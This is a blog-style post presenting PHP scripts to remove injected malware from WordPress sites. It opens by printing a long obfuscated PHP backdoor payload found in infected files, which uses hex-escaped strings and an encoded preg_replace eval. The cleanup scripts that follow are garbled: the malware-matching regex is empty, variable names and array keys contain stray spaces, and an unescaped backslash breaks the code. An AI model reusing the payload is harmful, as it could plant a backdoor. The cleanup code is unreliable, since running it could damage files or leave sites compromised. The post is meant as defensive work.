Remove malicious code from PHP files in wordpress

Some of the company's wordpress websites had malicious code in the downloaded plug-ins, which resulted in the presence of malicious code in the PHP files of all websites on the entire server, so I wrote a simple script to remove them.

!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#!#]y81]273]y>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#^#zsfvrx5c%x7827&6hmg%x5c%x7825!j%%x5c%x7825:|:**t%x5c%xW~!%x5c%x7825z!>215b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!:8:|:7#6ufs!|ftmf!~!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825%x5c%x782f7rfs%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%7825)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfV%x5c%x787fu%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace("%x2f%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%xS["%x61%156%x75%156%x61"]=1; function f:h%x5c%x7825:!2p%x5c2fh%x5c%x7825:%x5c%x7825fdyUm%x5c%x5c%x7825!qp%x5c%x7825!|Z~!!2p%x5c%x7825!|!*!***b%x5#P#-#Q#-#B#-#T#-#E#-#G#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*WCw*[!%x5c%x7825rN}#QwTW%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%25)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%7827pd%x5c%x78256b%x5c%x7825!*##>>X)!gjZb%x5c%x7825!**X)ufttj%x7825c:>11%x5c%x782272qj%x5c%x7825)7gj6!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!>}R;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}X;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]D6M7]K3#}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x55c%x787fw6>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x7825q5c%x7825)!gj!2bd%x5c%x7825!2qj%x5c%x78257-K)udfoopdXA%x54!#]y76]277]y72]265]y39]274]y85]273]y66<.4>1?*2b%x5c%x7825)gpf{jt)!gj!:r7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]KC#>2*!%x5c%x7825z>3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]K4]65]D8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!#]y84]275]y83]248]y83]256c%x7825V%x5c%x7827{ftmfV%x5c%x787f%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qjA)qj3hopmA%x578Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%>!}W;utpi}Y;tuofuopd%x5c%x7tsbqA7>q%x5c%x78256%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!OVMM*#L4]275L3]248L3P6L1M5]D2P4]D6#>1*!%x5c%x7825b:]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%e56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTbek!~!bjepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*q%x5c%x7825V>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!5)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~#]y31]278]y3e]81]K78:569x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWtj%x5c%x7822)gj6!%x5c%x782400~:Ew:Qb:Qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>11%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x782{66~6j%x5c%x7825!*3!%x5c%x7827c%x78256!#]y84]275]y83]273]y76]277#2b%x5c%7825%x5c%x7827Y%x5c%x78256<.msv>EzH,2W%x5c%x7825wN;#-Ez-1H9%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x5fdy)##-!#~2%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#

/**
 * File name: delUnwantedCode.php
 * Function: Delete malicious code in FTP
 * Instructions for use:
 * Please upload the file to the directory where the malicious code needs to be removed, and then access it through CLI or browser. The original one is infected files will be automatically backed up
*/


$path = dirname(__FILE__); #Define the directory to be processed
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php '); #Define the source file backup directory. Before the program filters out malicious codes, first back up the documents to this directory according to the original path
$fileType = array('php'); #Define the file type (suffix name) that needs to be processed, Lowercase
$search = array('@@si'); #Define malicious code rules that need to be filtered
$search_count = array(
 'all_file'=>array(), #All files
 'search_file0'=>array(), #No malicious code File
 'search_file1'=>array() #File containing malicious code
);


$filelist = listDir($path,$fileType,false); #Read the list of qualified files in the directory
if(!empty ($filelist)){
 foreach ($filelist as $file){
 $file = (isset($file['name'])?$file['name']:$file);
 $search_count['all_file '][] = $file;
 $fileContent = file_get_contents($file);
 $compile_fileContent = preg_replace($search, '', $fileContent);
 if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
 #If the file length is inconsistent after filtering, it means it contains malicious code (the directory where the backup file is located is not filtered)
 $search_count['search_file1'][] = $ file;

 ############Start backing up the original file##############
 $bakFile = str_replace($path, $bak_path, $file );
 @make_dir(dirname($bakFile));
 @file_put_contents($bakFile, $fileContent);
 ############End of backing up the original file######## #######

 #Rewrite the filtered content to the original PHP file
 @file_put_contents($file, $compile_fileContent);
 }else{
 $search_count['search_file0'][] = $ file;
 }
 }
}

#print_r($search_count);die;
echo sprintf('A total of %s qualified files were searched from %s, of which %s contained malicious code, and the processing has been completed ',$path,count($search_count['all_file']), count($search_count['search_file1']));die;























#######################
## Auxiliary function
################ ########

/**
 * Check whether the target folder exists, if not, automatically create the directory
 *
 * @access public
 * @param string folder directory path. Cannot use URLs relative to the website root
 *
 * @return bool
*/
function make_dir($folder){
 $reval = false;
 if (!file_exists($folder)){
 #If the directory does not exist then Try to create the directory
 @umask(0);

 #Split the directory path into an array
 preg_match_all('/([^/]*)/?/i', $folder, $atmp);

 #If If the first character is /, it will be treated as a physical path
 $base = ($atmp[0][0] == '/') ? '/' : '';

 #Traverse the array containing path information
 foreach ($atmp[1] AS $val){
 if ('' != $val){
 $base .= $val;
 if ('..' == $val || '.' == $val ){
 #If the directory is. or.., then directly add/continue to the next cycle
 $base .= '/';
 continue;
 }
 }else{
 continue;
 }

 $base .= '/ ';

 if (!file_exists($base)){
 #Try to create the directory, if the creation fails, continue the loop
 if (@mkdir(rtrim($base, '/'), 0777)){
 @chmod( $base, 0777);
 $reval = true;
 }
 }
 }
 }else{
 #The path already exists.Return whether the path is a directory
 $reval = is_dir($folder);
 }

 clearstatcache();

 return $reval;
}


########Get all files in the directory, Include the beginning of subdirectories################
function listDir($path,$fileType=array(),$fileInfo=true){
 $path = str_replace(array('/ ','\'), DIRECTORY_SEPARATOR, $path);
 if(!file_exists($path)||!is_dir($path)){
 return '';
 }
 if(substr($path, -1, 1)==DIRECTORY_SEPARATOR){
 $path = substr($path, 0,-1);
 }
 $dirList=array();
 $dir=opendir($path);
 while($file=readdir( $dir)){
 #If $fileType is defined and the file type is not within the range of $fileType or the file is a directory, skip
 if($file!=='.'&&$file!=='.. '){
 $file = $path.DIRECTORY_SEPARATOR.$file;
 if(is_dir($file)){
 if(empty($fileType)){
 $dirList[] = ($fileInfo==true?array( 'name'=>$file,'isDir'=>intval(is_dir($file))):$file);
 }
 $dirList = array_merge($dirList,listDir($file,$fileType));
 }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
 $dirList[] = ($fileInfo==true?array('name'=>$ file,'isDir'=>intval(is_dir($file)),'md5_file'=>md5_file($file),'filesize'=>filesize($file),'filemtime'=>filemtime($ file)):$file);
 }
 };
 };
 closedir($dir);
 return $dirList;
}
########Get all files in the directory, including the end of the subdirectory# ###############

/**
 * File name: delAllUnwantedCode.php
 * Function: Delete malicious code in FTP (supports any number of file processing)
 * Instructions for use:
 * Please upload the file to the directory where the malicious code needs to be removed, and then use CLI or browser Just access it, and the original infected files will be automatically backed up
*/
set_time_limit(0);ignore_user_abort(true);

$path = dirname(__FILE__); #Define the directory that needs to be processed
$bak_path = $path .DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #Define the source file backup directory. Before the program filters the malicious code, first back up the documents to this directory according to the original path
$fileType = array('php'); #Definition File type to be processed (suffix name), lowercase
$search = array('@@si'); #Define malicious code rules that need to be filtered
$file_count = array(
 'all_file'=>0, #All files
 'filter_file'=> 0 #Files containing malicious code
);

replaceUnwantedCode($path); #Execute filtering

#print_r($search_count);die;
echo sprintf('A total of %s files that meet the criteria were searched from %s , %s of which contain malicious code have been cleaned, and the original files are saved in %s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);die;



function replaceUnwantedCode($path){
 global $bak_path,$fileType,$search,$file_count;
 $path = str_replace(array('/','\'), DIRECTORY_SEPARATOR, $path);
 if(! file_exists($path)||!is_dir($path)){
 return '';
 }
 if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
 $path = substr($path, 0 ,-1);
 }
 $dir=opendir($path);
 while($file=readdir($dir)){
 #If $fileType is defined, and the file type is not within the range of $fileType or the file is a directory, skip
 if($file!=='.'&&$file!=='..'){
 $file = $path.DIRECTORY_SEPARATOR.$file;
 if(is_dir($file)){
 replaceUnwantedCode($file);
 }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
 ############## #################
 @$file_count['all_file']++;
 $fileContent = file_get_contents($file); #File original code
 $compile_fileContent = preg_replace( $search, '', $fileContent); #Filtered content
 if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
 # If the length of the file after filtering is inconsistent, it means it contains malicious code (the directory where the backup file is located is not filtered)
 $file_count['filter_file']++;

 ############Start backing up the original file# ##############
 $bakFile = str_replace($path, $bak_path, $file);
 @make_dir(dirname($bakFile));
 @file_put_contents($bakFile, $fileContent );
 ############End of backing up the original file##############

 #Rewrite the filtered content to the original PHP File
 @file_put_contents($file, $compile_fileContent);
 }
 ###############################
 unset( $fileContent,$compile_fileContent);
 }
 };
 };
 closedir($dir);
 return true;
}





################ ########
## Auxiliary function
######################

/**
 * Check whether the target folder exists, if not, automatically create the directory
 *
 * @access public
 * @param string folder directory path. Cannot use URLs relative to the website root
 *
 * @return bool
*/
function make_dir($folder){
 $reval = false;
 if (!file_exists($folder)){
 #If the directory does not exist, try to create it
 @umask(0);

 #Split the directory path into Array
 preg_match_all('/([^/]*)/?/i', $folder, $atmp);

 #If the first character is /, it will be treated as a physical path
 $base = ($atmp[ 0][0] == '/') ? '/' : '';

 #Traverse the array containing path information
 foreach ($atmp[1] AS $val){
 if ('' != $val ){
 $base .= $val;
 if ('..' == $val || '.' == $val){
 #If the directory is. or.., directly add/continue to the next cycle
 $base .= '/';
 continue;
 }
 }else{
 continue;
 }

 $base .= '/';

 if (!file_exists($base)){
 #Try to create a directory, If creation fails, continue looping
 if (@mkdir(rtrim($base, '/'), 0777)){
 @chmod($base, 0777);
 $reval = true;
 }
 }
 }
 } else{
 #The path already exists. Return whether the path is a directory
 $reval = is_dir($folder);
 }

 clearstatcache();

 return $reval;
}

Malicious code, wordpress, PHP